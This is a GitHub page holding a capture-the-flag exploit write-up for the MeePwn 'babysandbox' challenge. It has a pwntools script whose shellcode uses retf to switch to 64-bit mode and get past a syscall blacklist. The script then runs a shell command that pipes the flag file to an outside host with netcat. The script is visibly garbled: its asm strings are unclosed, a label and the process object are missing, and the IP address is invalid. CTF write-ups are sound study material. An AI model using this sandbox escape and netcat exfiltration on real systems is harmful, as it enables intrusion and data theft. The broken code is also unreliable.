Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

Meepwn CTF - babysandbox

  • retf instroction change cs to 0x33 -> switch to x64 mode and execute x64 instruction.
  • Different syscall number in x64 -> bypass sandbox badsyscall number black list.
#!/usr/bin/env python
from pwn import *
from base64 import b64encode as b64en
import re

# MeePwnCTF{Unicorn_Engine_Is_So_Good_But_Not_Perfect}

#y = process( './bin' )

x86 = asm('''
    call y              /* leave eip address on stack */
    pop ebx             /* pop get rip address */
    mov eax, 0x33       /* cs 0x33 -> 64bit mode */
    push eax
    add ebx, 0xc
    push ebx
    retf                /* retf instruction to switch to 64bit mode -> different syscall number to bypass sanbox */

context.arch = 'amd64'

#cmd = 'ls | nc 12.345.666.77 3333'
cmd = 'cat flag | nc 12.345.666.77 3333'

x64 = asm(
    shellcraft.pushstr_array('rsi' , ['sh','-c',cmd]) + 
    xor rdx, rdx
    mov rax, 0x68732f6e69622f
    push rax
    mov rdi, rsp
    mov rax, 0x3b

print b64en( x86 + x64 )

y.send( x86 + x64 )

You can’t perform that action at this time.